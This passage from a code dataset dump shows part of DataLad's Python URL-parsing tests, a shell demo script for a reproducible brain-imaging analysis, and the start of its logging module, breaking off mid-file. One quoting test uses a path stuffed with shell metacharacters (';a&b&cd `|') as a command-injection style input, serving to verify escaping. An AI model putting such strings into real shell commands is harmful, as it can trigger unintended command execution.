'http://example.com/;param') # but we do maintain original string\n assert_in('ParseResults contains params', cml.out)\n eq_(purl.as_str(), 'http://example.com/')\n\n\n@with_tempfile\ndef test_pathri_guessing(filename=None):\n # Complaining about ;param only at DEBUG level\n # see https://github.com/datalad/datalad/issues/6872\n with swallow_logs(new_level=logging.DEBUG) as cml:\n # we don't \"care\" about params ATM so there is a warning if there are any\n ri = RI(f\"{filename};param\")\n assert isinstance(ri, PathRI)\n if not on_windows:\n # Does not happen on Windows since paths with \\ instead of / do not\n # look like possible URLs\n assert_in('ParseResults contains params', cml.out)\n\n\n@skip_if(not on_windows)\ndef test_pathri_windows_anchor():\n assert RI('file:///c:/Windows').localpath == 'C:\\\\Windows'\n\n\n@known_failure_githubci_win\ndef test_url_samples():\n _check_ri(\"http://example.com\", URL, scheme='http', hostname=\"example.com\", netloc='example.com')\n # \"complete\" one for classical http\n _check_ri(\"http://user:[email 
protected]:8080/p/sp?p1=v1&p2=v2#frag\", URL,\n scheme='http', netloc='user:[email protected]:8080',\n hostname=\"example.com\", port=8080, username='user', password='pw',\n path='/p/sp', query='p1=v1&p2=v2', fragment='frag')\n\n # sample one for ssh with specifying the scheme\n # XXX? might be useful? https://github.com/FriendCode/giturlparse.py\n _check_ri(\"ssh://host/path/sp1\", URL, scheme='ssh', hostname='host',\n netloc='host', path='/path/sp1')\n _check_ri(\"user@host:path/sp1\", SSHRI,\n hostname='host', path='path/sp1', username='user')\n _check_ri(\"host:path/sp1\", SSHRI, hostname='host', path='path/sp1')\n _check_ri(\"host:path\", SSHRI, hostname='host', path='path')\n _check_ri(\"host:/path\", SSHRI, hostname='host', path='/path')\n _check_ri(\"user@host\", SSHRI, hostname='host', username='user')\n # TODO!!! should this be a legit URL like this?\n # _check_ri(\"host\", SSHRI, hostname='host'))\n eq_(repr(RI(\"host:path\")), \"SSHRI(hostname='host', path='path')\")\n\n # And now perspective 'datalad', implicit=True urls pointing to the canonical center location\n _check_ri(\"///\", DataLadRI)\n _check_ri(\"///p/s1\", DataLadRI, path='p/s1')\n # could be considered by someone as \"URI reference\" relative to scheme\n _check_ri(\"//a/\", DataLadRI, remote='a')\n _check_ri(\"//a/data\", DataLadRI, path='data', remote='a')\n\n # here we will do custom magic allowing only schemes with + in them, such as dl+archive\n # or not so custom as\n _check_ri(\"hg+https://host/user/proj\", URL, scheme=\"hg+https\",\n netloc='host', hostname='host', path='/user/proj')\n # \"old\" style\n _check_ri(\"dl+archive:KEY/path/sp1#size=123\", URL,\n scheme='dl+archive', path='KEY/path/sp1', fragment='size=123')\n # \"new\" style\n _check_ri(\"dl+archive:KEY#path=path/sp1&size=123\", URL,\n scheme='dl+archive', path='KEY', fragment='path=path/sp1&size=123')\n # actually above one is probably wrong since we need to encode the path\n _check_ri(\"dl+archive:KEY#path=path%2Fbsp1&size=123\", URL,\n scheme='dl+archive', path='KEY', fragment='path=path%2Fbsp1&size=123')\n\n #https://en.wikipedia.org/wiki/File_URI_scheme\n _check_ri(\"file://host\", URL, scheme='file', netloc='host', hostname='host')\n _check_ri(\"file://host/path/sp1\", URL, scheme='file', netloc='host',\n hostname='host', path='/path/sp1')\n # stock libraries of Python aren't quite ready for ipv6\n ipv6address = '2001:db8:85a3::8a2e:370:7334'\n _check_ri(\"file://%s/path/sp1\" % ipv6address, URL,\n scheme='file', netloc=ipv6address, hostname=ipv6address,\n path='/path/sp1')\n for lh in ('localhost', '::1', '', '127.3.4.155'):\n if on_windows:\n url = RI(f\"file://{lh}/path/sp1\")\n assert url.localpath == f'\\\\\\\\{lh}\\\\path\\\\sp1' if lh else '\\\\path\\\\sp1'\n else:\n _check_ri(\"file://%s/path/sp1\" % lh, URL, localpath='/path/sp1',\n scheme='file', netloc=lh, hostname=lh, path='/path/sp1')\n\n _check_ri('http://[1fff:0:a88:85a3::ac1f]:8001/index.html', URL,\n scheme='http', netloc='[1fff:0:a88:85a3::ac1f]:8001',\n hostname='1fff:0:a88:85a3::ac1f', port=8001, path='/index.html')\n _check_ri(\"file:///path/sp1\", URL, localpath='/path/sp1', scheme='file', path='/path/sp1')\n # we don't do any magical comprehension for home paths/drives for windows\n # of file:// urls, thus leaving /~ and /c: for now:\n _check_ri(\"file:///~/path/sp1\", URL, localpath='/~/path/sp1', scheme='file', path='/~/path/sp1')\n _check_ri(\"file:///%7E/path/sp1\", URL, localpath='/~/path/sp1', scheme='file', path='/~/path/sp1', exact_str=False)\n # not sure but 
let's check\n if on_windows:\n _check_ri(\"file:///C:/path/sp1\", URL, localpath='C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n _check_ri(\"file:/C:/path/sp1\", URL, localpath='C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n # git-annex style drive-letter encoding\n _check_ri(\"file://C:/path/sp1\", URL, netloc=\"C:\", hostname=\"c\", localpath='C:/path/sp1', scheme='file', path='/path/sp1', exact_str=False)\n else:\n _check_ri(\"file:///C:/path/sp1\", URL, localpath='/C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n _check_ri(\"file:/C:/path/sp1\", URL, localpath='/C:/path/sp1', scheme='file', path='/C:/path/sp1', exact_str=False)\n\n # and now implicit paths or actually they are also \"URI references\"\n _check_ri(\"f\", PathRI, localpath='f', path='f')\n _check_ri(\"f/s1\", PathRI, localpath='f/s1', path='f/s1')\n _check_ri(PurePosixPath(\"f\"), PathRI, localpath='f', path='f')\n _check_ri(PurePosixPath(\"f/s1\"), PathRI, localpath='f/s1', path='f/s1')\n # colons are problematic and might cause confusion into SSHRI\n _check_ri(\"f/s:1\", PathRI, localpath='f/s:1', path='f/s:1')\n _check_ri(\"f/s:\", PathRI, localpath='f/s:', path='f/s:')\n _check_ri(\"/f\", PathRI, localpath='/f', path='/f')\n _check_ri(\"/f/s1\", PathRI, localpath='/f/s1', path='/f/s1')\n\n # some github ones, just to make sure\n _check_ri(\"git://host/user/proj\", URL, scheme=\"git\", netloc=\"host\",\n hostname=\"host\", path=\"/user/proj\")\n _check_ri(\"git@host:user/proj\", SSHRI, hostname=\"host\", path=\"user/proj\", username='git')\n\n _check_ri('weird:/', SSHRI, hostname='weird', path='/')\n # since schema is not allowing some symbols so we need to add additional check\n _check_ri('weird_url:/', SSHRI, hostname='weird_url', path='/')\n _check_ri('example.com:/', SSHRI, hostname='example.com', path='/')\n _check_ri('example.com:path/sp1', SSHRI, hostname='example.com', path='path/sp1')\n _check_ri('example.com/path/sp1\\\\:fname', PathRI, localpath='example.com/path/sp1\\\\:fname',\n path='example.com/path/sp1\\\\:fname')\n # ssh is as stupid as us, so we will stay \"Consistently\" dumb\n \"\"\"\n $> ssh example.com/path/sp1:fname\n ssh: Could not resolve hostname example.com/path/sp1:fname: Name or service not known\n\n edit 20190516 yoh: but this looks like a perfectly valid path.\n SSH knows that it is not a path but its SSHRI so it can stay dumb.\n We are trying to be smart and choose between RIs (even when we know that\n it is e.g. a file).\n \"\"\"\n _check_ri('e.com/p/sp:f', PathRI, localpath='e.com/p/sp:f', path='e.com/p/sp:f')\n _check_ri('[email protected]/mydir', PathRI, localpath='[email protected]/mydir', path='[email protected]/mydir')\n\n # SSHRIs have .port, but it is empty\n eq_(SSHRI(hostname='example.com').port, '')\n\n # check that we are getting a warning logged when url can't be reconstructed\n # precisely\n # actually failed to come up with one -- becomes late here\n #_check_ri(\"http://host///..//p\", scheme='http', path='/..//p')\n\n # actually this one is good enough to trigger a warning and I still don't know\n # what it should exactly be!?\n with swallow_logs(new_level=logging.DEBUG) as cml:\n weird_str = 'weird://'\n weird_url = RI(weird_str)\n repr(weird_url)\n cml.assert_logged(\n 'Parsed version of SSHRI .weird:/. 
'\n 'differs from original .weird://.'\n )\n # but we store original str\n eq_(str(weird_url), weird_str)\n neq_(weird_url.as_str(), weird_str)\n\n raise SkipTest(\"TODO: file://::1/some does complain about parsed version dropping ::1\")\n\n\ndef test_git_transport_ri():\n _check_ri(\"gcrypt::http://somewhere\", GitTransportRI, RI='http://somewhere', transport='gcrypt')\n # man git-push says\n # <transport>::<address>\n # where <address> may be a path, a server and path, or an arbitrary URL-like string...\n # so full path to my.com/... should be ok?\n _check_ri(\"http::/my.com/some/path\", GitTransportRI, RI='/my.com/some/path', transport='http')\n # some ssh server. And we allow for some additional chars in transport.\n # Git doesn't define since it does not care! we will then be flexible too\n _check_ri(\"trans-port::server:path\", GitTransportRI, RI='server:path', transport='trans-port')\n\n\[email protected](\"cls,clskwargs,target_url\", [\n (SSHRI, {}, r'example.com:/ \"' + r\"';a&b&cd `| \"),\n (URL, {'scheme': \"http\"}, 'http://example.com/%20%22%27%3Ba%26b%26cd%20%60%7C%20'),\n (PathRI, {}, r'/ \"' + r\"';a&b&cd `| \"), # nothing is done to file:implicit\n])\ndef test_url_quote_path(cls, clskwargs, target_url):\n path = '/ \"\\';a&b&cd `| '\n if not (cls is PathRI):\n clskwargs['hostname'] = hostname = 'example.com'\n url = cls(path=path, **clskwargs)\n eq_(url.path, path)\n if 'hostname' in clskwargs:\n eq_(url.hostname, hostname)\n # all nasty symbols should be quoted\n url_str = str(url)\n eq_(url_str, target_url)\n # no side-effects:\n eq_(url.path, path)\n if 'hostname' in clskwargs:\n eq_(url.hostname, hostname)\n\n # and figured out and unquoted\n url_ = RI(url_str)\n ok_(isinstance(url_, cls))\n eq_(url_.path, path)\n if 'hostname' in clskwargs:\n eq_(url.hostname, hostname)\n\n\ndef test_url_compose_archive_one():\n url = URL(scheme='dl+archive', path='KEY',\n fragment=dict((('path', 'f/p/ s+'), ('size', 30))))\n # funny - space is encoded as + but + is %2B\n eq_(str(url), 'dl+archive:KEY#path=f/p/+s%2B&size=30')\n eq_(url.fragment_dict, {'path': 'f/p/ s+', 'size': '30'})\n\n\ndef test_url_fragments_and_query():\n url = URL(hostname=\"host\", query=dict((('a', 'x/b'), ('b', 'y'))))\n eq_(str(url), '//host?a=x%2Fb&b=y')\n eq_(url.query, 'a=x%2Fb&b=y')\n eq_(url.query_dict, {'a': 'x/b', 'b': 'y'})\n\n url = URL(hostname=\"host\", fragment=dict((('b', 'x/b'), ('a', 'y'))))\n eq_(str(url), '//host#b=x/b&a=y')\n eq_(url.fragment, 'b=x/b&a=y')\n eq_(url.fragment_dict, {'a': 'y', 'b': 'x/b'})\n\n fname = get_most_obscure_supported_name()\n url = URL(hostname=\"host\", fragment={'a': fname})\n eq_(url.fragment_dict, {'a': fname})\n\n\ndef test_url_dicts():\n eq_(URL(\"http://host\").query_dict, {})\n\n\ndef test_get_url_path_on_fileurls():\n assert URL('file:///a').path == '/a'\n assert URL('file:///a/b').path == '/a/b'\n assert URL('file:///a/b').localpath == local_path_representation('/a/b')\n assert URL('file:///a/b#id').path == '/a/b'\n assert URL('file:///a/b?whatever').path == '/a/b'\n\n\ndef test_is_url():\n ok_(is_url('file://localhost/some'))\n ok_(is_url('http://localhost'))\n ok_(is_url('ssh://me@localhost'))\n # in current understanding it is indeed a url but an 'ssh', implicit=True, not just\n # a useless scheme=weird with a hope to point to a netloc\n with swallow_logs():\n ok_(is_url('weird://'))\n nok_(is_url('relative'))\n nok_(is_url('/absolute'))\n ok_(is_url('like@sshlogin')) # actually we do allow ssh:implicit urls ATM\n nok_(is_url(''))\n nok_(is_url(' '))\n 
nok_(is_url(123)) # stuff of other types wouldn't be considered a URL\n\n # we can pass RI instance directly\n ok_(is_url(RI('file://localhost/some')))\n nok_(is_url(RI('relative')))\n\n\n# TODO: RF with test_is_url to avoid duplication\ndef test_is_datalad_compat_ri():\n ok_(is_datalad_compat_ri('ssh://user:passw@host/path'))\n ok_(is_datalad_compat_ri('http://example.com'))\n ok_(is_datalad_compat_ri('file://localhost/some'))\n ok_(is_datalad_compat_ri('///localhost/some'))\n nok_(is_datalad_compat_ri('relative'))\n nok_(is_datalad_compat_ri('.///localhost/some'))\n nok_(is_datalad_compat_ri(123))\n\n\ndef test_get_local_file_url():\n compat_annex = 'git-annex'\n compat_git = 'git'\n for path, url, compatibility in (\n # relpaths are special-cased below\n ('test.txt', 'test.txt', compat_annex),\n (OBSCURE_FILENAME, urlquote(OBSCURE_FILENAME), compat_annex),\n ) + ((\n ('C:\\\\Windows\\\\notepad.exe', 'file://C:/Windows/notepad.exe', compat_annex),\n ('C:\\\\Windows\\\\notepad.exe', 'file:///C:/Windows/notepad.exe', compat_git),\n ) if on_windows else (\n ('/a', 'file:///a', compat_annex),\n ('/a/b/c', 'file:///a/b/c', compat_annex),\n ('/a~', 'file:///a~', compat_annex),\n # there are no files with trailing slashes in the name\n #('/a b/', 'file:///a%20b/'),\n ('/a b/name', 'file:///a%20b/name', compat_annex),\n )):\n # Yarik found no better way to trigger. .decode() isn't enough\n print(\"D: %s\" % path)\n if isabs(path):\n assert get_local_file_url(path, compatibility=compatibility) == url\n abs_path = path\n else:\n assert get_local_file_url(path, allow_relative_path=True, compatibility=compatibility) \\\n == '/'.join((get_local_file_url(os.getcwd(), compatibility=compatibility), url))\n abs_path = opj(os.getcwd(), path)\n if compatibility == compat_git:\n assert get_local_file_url(abs_path, compatibility=compatibility) == Path(abs_path).as_uri()\n\n\n@with_tempfile(mkdir=True)\ndef test_get_local_file_url_compatibility(path=None):\n # smoke test for file:// URL compatibility with other datalad/git/annex\n # pieces\n path = Path(path)\n ds1 = Dataset(path / 'ds1').create()\n ds2 = Dataset(path / 'ds2').create()\n testfile = path / 'testfile.txt'\n testfile.write_text('some')\n\n # compat with annex addurl\n ds1.repo.add_url_to_file(\n 'test.txt',\n get_local_file_url(str(testfile), compatibility='git-annex'))\n\n # compat with git clone/submodule\n assert_status(\n 'ok',\n ds1.clone(get_local_file_url(ds2.path, compatibility='git'),\n result_xfm=None, return_type='generator'))\n\n\ndef test_is_ssh():\n\n ssh_locators = [\"ssh://host\",\n \"ssh://host/some/where\",\n \"user@host:path/sp1\",\n \"user@host:/absolute/path/sp1\",\n \"host:path/sp1\",\n \"host:/absolute/path/sp1\",\n \"user@host\"]\n for ri in ssh_locators:\n ok_(is_ssh(ri), \"not considered ssh (string): %s\" % ri)\n ok_(is_ssh(RI(ri)), \"not considered ssh (RI): %s\" % ri)\n\n non_ssh_locators = [\"file://path/to\",\n \"/abs/path\",\n \"../rel/path\",\n \"http://example.com\",\n \"git://host/user/proj\",\n \"s3://bucket/save/?key=891\"]\n for ri in non_ssh_locators:\n ok_(not is_ssh(ri), \"considered ssh (string): %s\" % ri)\n ok_(not is_ssh(RI(ri)), \"considered ssh (RI): %s\" % ri)\n\n\ndef test_iso8601_to_epoch():\n epoch = 1467901515\n eq_(iso8601_to_epoch('2016-07-07T14:25:15+00:00'), epoch)\n eq_(iso8601_to_epoch('2016-07-07T14:25:15+11:00'),\n epoch - 11 * 60 * 60)\n eq_(iso8601_to_epoch('2016-07-07T14:25:15Z'), epoch)\n eq_(iso8601_to_epoch('2016-07-07T14:25:15'), epoch)\n\n 
eq_(iso8601_to_epoch('2016-07-07T14:25:14'), epoch-1)\n\n\ndef test_mapping_identity():\n from datalad.tests.utils_pytest import OBSCURE_FILENAME\n\n absolute_obscure_path = str(Path('/').absolute() / OBSCURE_FILENAME)\n temp_dir = tempfile.gettempdir()\n print(f\"temp_dir: {temp_dir}\")\n for name in (temp_dir, opj(temp_dir, \"x.txt\"), absolute_obscure_path):\n # On some platforms, e.g. MacOS, `temp_dir` might contain trailing\n # slashes. Since the conversion and its inverse normalize paths, we\n # compare the result to the normalized path\n normalized_name = str(Path(name))\n assert url_path2local_path(local_path2url_path(name)) == normalized_name\n\n prefix = \"/C:\" if on_windows else \"\"\n for name in map(quote_path, (prefix + \"/window\", prefix + \"/d\", prefix + \"/\" + OBSCURE_FILENAME)):\n assert local_path2url_path(url_path2local_path(name)) == name\n\n\ndef test_auto_resolve_path():\n relative_path = str(Path(\"a/b\"))\n with pytest.raises(ValueError):\n local_path2url_path(relative_path)\n local_path2url_path(\"\", allow_relative_path=True)\n\n\n@skip_if(not on_windows)\ndef test_hostname_detection():\n with pytest.raises(ValueError):\n local_path2url_path(\"\\\\\\\\server\\\\share\\\\path\")\n\n\ndef test_url_path2local_path_excceptions():\n with pytest.raises(ValueError):\n url_path2local_path('')\n with pytest.raises(ValueError):\n url_path2local_path(None)\n with pytest.raises(ValueError):\n url_path2local_path('a/b')\n with pytest.raises(ValueError):\n url_path2local_path(PurePosixPath('a/b'))\n with pytest.raises(ValueError):\n url_path2local_path(PurePosixPath('//a/b'))\n\n\ndef test_quote_path(monkeypatch):\n with monkeypatch.context() as ctx:\n ctx.setattr(datalad.support.network, 'on_windows', True)\n assert quote_path(\"/c:/win:xxx\") == \"/c:/win%3Axxx\"\n assert quote_path(\"/C:/win:xxx\") == \"/C:/win%3Axxx\"\n\n ctx.setattr(datalad.support.network, 'on_windows', False)\n assert quote_path(\"/c:/win:xxx\") == \"/c%3A/win%3Axxx\"\n assert quote_path(\"/C:/win:xxx\") == \"/C%3A/win%3Axxx\"\n" }, { "alpha_fraction": 0.7521818280220032, "alphanum_fraction": 0.7596914768218994, "avg_line_length": 56.96470642089844, "blob_id": "9a61960f2ea7f0d0bcd40f4eb5c750c7e2361b32", "content_id": "44907aa45ce5a85e24dca1c4452cd92dbba318d7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4927, "license_type": "permissive", "max_line_length": 276, "num_lines": 85, "path": "/docs/casts/reproducible_analysis.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"Scientific studies should be reproducible, and with the increasing accessibility of data, there is not much excuse for lack of reproducibility anymore.\"\nsay \"DataLad can help with the technical aspects of reproducible science...\"\nsay \"It always starts with a dataset\"\nrun \"datalad create demo\"\nrun \"cd demo\"\n\nsay \"For this demo we are using two public brain imaging datasets that were published on OpenFMRI.org, and are available from DataLad's datasets.datalad.org\"\nrun \"datalad install -d . -s ///openfmri/ds000001 inputs/ds000001\"\n\nsay \"BTW: '///' is just short for https://datasets.datalad.org\"\n\nrun \"datalad install -d . 
-s ///openfmri/ds000002 inputs/ds000002\"\n\nsay \"Both datasets are now registered as subdatasets, and their precise versions are on record\"\nrun \"datalad --output-format '{path}: {revision_descr}' subdatasets\"\n\nsay \"However, very little data were actually downloaded (the full datasets are several gigabytes in size):\"\nrun \"du -sh inputs/\"\n\nsay \"DataLad datasets are fairly lightweight in size, they only contain pointers to data and history information in their minimal form.\"\n\nsay \"Both datasets contain brain imaging data, and are compliant with the BIDS standard. This makes it really easy to locate particular images and perform analysis across datasets.\"\nsay \"Here we will use a small script that performs 'brain extraction' using FSL as a stand-in for a full analysis pipeline\"\nrun \"mkdir code\"\nrun \"cat << EOT > code/brain_extraction.sh\n# enable FSL\n. /etc/fsl/5.0/fsl.sh\n\n# obtain all inputs\ndatalad get \\\\\\$@\n# perform brain extraction\ncount=1\nfor nifti in \\\\\\$@; do\n subdir=\\\"sub-\\\\\\$(printf %03d \\\\\\$count)\\\"\n mkdir -p \\\\\\$subdir\n echo \\\"Processing \\\\\\$nifti\\\"\n bet \\\\\\$nifti \\\\\\$subdir/anat -m\n count=\\\\\\$((count + 1)) \ndone\nEOT\"\n\nsay \"Note that this script uses the 'datalad get' command which automatically obtains the required files from their remote source -- we will see this in action shortly\"\nsay \"We are saving this script in the dataset. This way we will know exactly which code was used for the analysis. Also, we track this code file with Git, so we can see more easily how it was edited over time.\"\nrun \"datalad save code -m \\\"Brain extraction script\\\" --to-git\"\n\nsay \"In addition, we will \\\"tag\\\" this state of the dataset. This is optional, but it can help to identify important milestones more easily\"\nrun \"datalad save --version-tag setup_done\"\n\nsay \"Now we can run our analysis code to produce results. However, instead of running it directly, we will run it with DataLad -- this will automatically create a record of exactly how this script was executed\"\nsay \"For this demo we will just run it on the structural images of the first subject from each dataset. The uniform structure of the datasets makes this very easy. Of course we could run it on all subjects; we are simply saving some time for this demo.\"\nsay \"While the command runs, you should notice a few things:\"\nsay \"1) We run this command with 'bash -e' to stop at any failure that may occur\"\nsay \"2) You'll see the required data files being obtained as they are needed -- and only those that are actually required will be downloaded\"\nrun \"datalad run bash -e code/brain_extraction.sh inputs/ds*/sub-01/anat/sub-01_T1w.nii.gz\"\n\nsay \"The analysis step is done, all generated results were saved in the dataset. 
All changes, including the command that caused them are on record\"\nrun \"git show --stat\"\n\nsay \"DataLad has enough information stored to be able to re-run a command.\"\nsay \"On command exit, it will inspect the results and save them again, but only if they are different.\"\nsay \"In our case, the re-run yields bit-identical results, hence nothing new is saved.\"\nrun \"datalad rerun\"\n\nsay \"Now that we are done, and have checked that we can reproduce the results ourselves, we can clean up\"\nsay \"DataLad can easily verify if any part of our input dataset was modified since we configured our analysis\"\nrun \"datalad diff --revision setup_done inputs\"\n\nsay \"Nothing was changed.\"\nsay \"With DataLad with don't have to keep those inputs around -- without losing the ability to reproduce an analysis.\"\nsay \"Let's uninstall them -- checking the size on disk before and after\"\n\nrun \"du -sh\" .\nrun \"datalad uninstall inputs/*\"\nrun \"du -sh .\"\nsay \"All inputs are gone...\"\nrun \"ls inputs/*\"\n\nsay \"Only the remaining data (our code and the results) need to be kept and require a backup for long term archival. Everything else can be re-obtained as needed, when needed.\"\n\nsay \"As DataLad knows everything needed about the inputs, including where to get the right version, we can re-run the analysis with a single command. Watch how DataLad re-obtains all required data, re-runs the code, and checks that none of the results changed and need saving\"\nrun \"datalad rerun\"\n\nsay \"Reproduced!\"\n\nsay \"This dataset could now be published and enable anyone to replicate the exact same analysis. Public data for the win!\"\n" }, { "alpha_fraction": 0.5845750570297241, "alphanum_fraction": 0.5886815786361694, "avg_line_length": 36.11030578613281, "blob_id": "8430fecb8c034b1733fdc193878d760f6a62fcae", "content_id": "646b9cdeb7dcb2ba1d4b5221dabb4c9782342fbc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25573, "license_type": "permissive", "max_line_length": 99, "num_lines": 689, "path": "/datalad/log.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Logging setup and utilities, including progress reporting\"\"\"\n\nfrom contextlib import contextmanager\nfrom functools import partial\nimport inspect\nimport logging\nimport os\nimport sys\nimport platform\nimport random\nimport logging.handlers\nimport warnings\n\nfrom os.path import basename, dirname\n\nfrom collections import defaultdict\n\nfrom .utils import is_interactive, optional_args\nfrom .support import ansi_colors as colors\n\n__all__ = [\n 'ColorFormatter',\n 'LoggerHelper',\n 'filter_noninteractive_progress',\n 'log_progress',\n 'with_progress',\n 'with_result_progress',\n]\n\n# Snippets from traceback borrowed from duecredit which was borrowed from\n# PyMVPA upstream/2.4.0-39-g69ad545 MIT license (the same copyright as DataLad)\n\n\ndef mbasename(s):\n \"\"\"Returns an expanded basename, if the filename is deemed not informative\n\n A '.py' extension is stripped from file name, and the containing directory\n is prepended 
for too generic file names like 'base', '__init__', and 'utils'\n\n Parameters\n ----------\n s: str\n Platform-native path\n\n Returns\n -------\n str\n \"\"\"\n base = basename(s)\n if base.endswith('.py'):\n base = base[:-3]\n if base in set(['base', '__init__', 'utils']):\n base = basename(dirname(s)) + '.' + base\n return base\n\n\nclass TraceBack(object):\n \"\"\"Customizable traceback for inclusion debug log messages\n \"\"\"\n\n def __init__(self, limit=100, collide=False):\n \"\"\"\n Parameters\n ----------\n collide : bool\n if True, deduplicate a subsequent message by replacing a common\n prefix string with an ellipsis.\n \"\"\"\n self.__prev = \"\"\n self.limit = limit\n self.collide = collide\n\n # delayed imports and preparing the regex substitution\n if collide:\n import re\n self.__prefix_re = re.compile('>[^>]*$')\n else:\n self.__prefix_re = None\n\n def _extract_stack(self, limit=None):\n \"\"\"Call traceback.extract_stack() with limit parameter\n\n Parameters\n ----------\n limit: int, optional\n Limit stack trace entries (starting from the invocation point)\n if limit is positive, or to the last `abs(limit)` entries.\n If limit is omitted or None, all entries are printed.\n\n Returns\n -------\n traceback.StackSummary\n \"\"\"\n import traceback\n return traceback.extract_stack(limit=limit)\n\n def __call__(self):\n # get the stack description. All but the last three items, which\n # represent the entry into this utility rather than the traceback\n # relevant for the caller\n ftb = self._extract_stack(limit=self.limit + 10)[:-3]\n # each item in `ftb` is\n # (filename, line, object, code-on-line)\n # so entries is a list of (filename, line)\n entries = [\n [mbasename(x[0]), str(x[1])] for x in ftb\n # the last entry in the filtered list will always come from\n # this datalad/log.py facility, where the log record\n # was emitted, it is not meaningful to always show a constant\n # trailing end of the traceback\n # more generally, we are hardly ever interested in traceback\n # pieces from this file\n if x[0] != __file__\n ]\n # remove more \"uninformative\" levels of the stack, given the space\n # constraints of a log message\n entries = [\n e for e in entries\n if e[0] not in ('unittest', 'logging.__init__')\n ]\n\n if len(entries) > self.limit:\n sftb = '…>'\n entries = entries[-self.limit:]\n else:\n sftb = ''\n\n if not entries:\n return \"\"\n\n # let's make it more concise\n entries_out = [entries[0]]\n for entry in entries[1:]:\n # if the current filename is the same as the last one on the stack\n # only append the line number to save space\n if entry[0] == entries_out[-1][0]:\n entries_out[-1][1] += ',%s' % entry[1]\n else:\n entries_out.append(entry)\n\n # format the traceback in a compact form\n sftb += '>'.join(\n ['%s:%s' % (mbasename(x[0]), x[1]) for x in entries_out]\n )\n\n if self.collide:\n # lets remove part which is common with previous invocation\n prev_next = sftb\n common_prefix = os.path.commonprefix((self.__prev, sftb))\n common_prefix2 = self.__prefix_re.sub('', common_prefix)\n\n if common_prefix2 != \"\":\n sftb = '…' + sftb[len(common_prefix2):]\n self.__prev = prev_next\n\n return sftb\n\n\nclass MemoryInfo(object):\n def __init__(self):\n try:\n from psutil import Process\n process = Process(os.getpid())\n self.memory_info = process.memory_info \\\n if hasattr(process, 'memory_info') \\\n else process.get_memory_info\n except:\n self.memory_info = None\n\n\n def __call__(self):\n \"\"\"Return utilization of virtual memory\n\n Generic 
implementation using psutil\n \"\"\"\n if not self.memory_info:\n return \"RSS/VMS: N/A\"\n mi = self.memory_info()\n # in later versions of psutil mi is a named tuple.\n # but that is not the case on Debian squeeze with psutil 0.1.3\n rss = mi[0] / 1024\n vms = mi[1] / 1024\n vmem = (rss, vms)\n\n try:\n return \"RSS/VMS: %d/%d kB\" % vmem\n except:\n return \"RSS/VMS: %s\" % str(vmem)\n\n# Recipe from http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output\n# by Brandon Thomson\n# Adjusted for automagic determination whether coloring is needed and\n# prefixing of multiline log lines\nclass ColorFormatter(logging.Formatter):\n\n def __init__(self, use_color=None, log_name=False, log_pid=False):\n if use_color is None:\n # if 'auto' - use color only if all streams are tty\n use_color = is_interactive()\n self.use_color = use_color and platform.system() != 'Windows' # don't use color on windows\n msg = colors.format_msg(self._get_format(log_name, log_pid),\n self.use_color)\n log_env = os.environ.get('DATALAD_LOG_TRACEBACK', '')\n collide = log_env == 'collide'\n # if an integer level is given, we add one level to make the behavior\n # more natural. The last frame will always be where the log record\n # was emitted by out handler. However, user is more interested in the\n # location where the log message originates.\n # Saying DATALAD_LOG_TRACEBACK=1 will give that in most cases, with\n # this internal increment\n limit = 100 if collide else int(log_env) + 1 if log_env.isdigit() else 100\n self._tb = TraceBack(collide=collide, limit=limit) if log_env else None\n\n self._mem = MemoryInfo() if os.environ.get('DATALAD_LOG_VMEM', '') else None\n logging.Formatter.__init__(self, msg)\n\n def _get_format(self, log_name=False, log_pid=False):\n from datalad import cfg\n from datalad.config import anything2bool\n show_timestamps = anything2bool(cfg.get('datalad.log.timestamp', False))\n return ((\"\" if not show_timestamps else \"$BOLD%(asctime)-15s$RESET \") +\n (\"%(name)-15s \" if log_name else \"\") +\n (\"{%(process)d}\" if log_pid else \"\") +\n \"[%(levelname)s] \"\n \"%(message)s \")\n\n def format(self, record):\n # safety guard if None was provided\n if record.msg is None:\n record.msg = \"\"\n else:\n # to avoid our logger puking on receiving exception instances etc.\n # .getMessage, used to interpolate it, would cast it to str anyways\n # and thus not puke\n record.msg = str(record.msg)\n if record.msg.startswith('| '):\n # If we already log smth which supposed to go without formatting, like\n # output for running a command, just return the message and be done\n return record.msg\n\n levelname = record.levelname\n\n if self.use_color and levelname in colors.LOG_LEVEL_COLORS:\n record.levelname = colors.color_word(\n \"{:7}\".format(levelname),\n colors.LOG_LEVEL_COLORS[levelname],\n force=True)\n record.msg = record.msg.replace(\"\\n\", \"\\n| \")\n if self._tb:\n if not getattr(record, 'notraceback', False):\n record.msg = self._tb() + \" \" + record.msg\n if self._mem:\n record.msg = \"%s %s\" % (self._mem(), record.msg)\n\n return logging.Formatter.format(self, record)\n\n\nclass ProgressHandler(logging.Handler):\n from datalad.ui import ui\n\n def __init__(self, other_handler=None):\n super(self.__class__, self).__init__()\n self._other_handler = other_handler\n self.pbars = {}\n\n def close(self):\n if self._other_handler:\n self._other_handler.close()\n super().close()\n\n def emit(self, record):\n from datalad.ui import ui\n if not hasattr(record, 
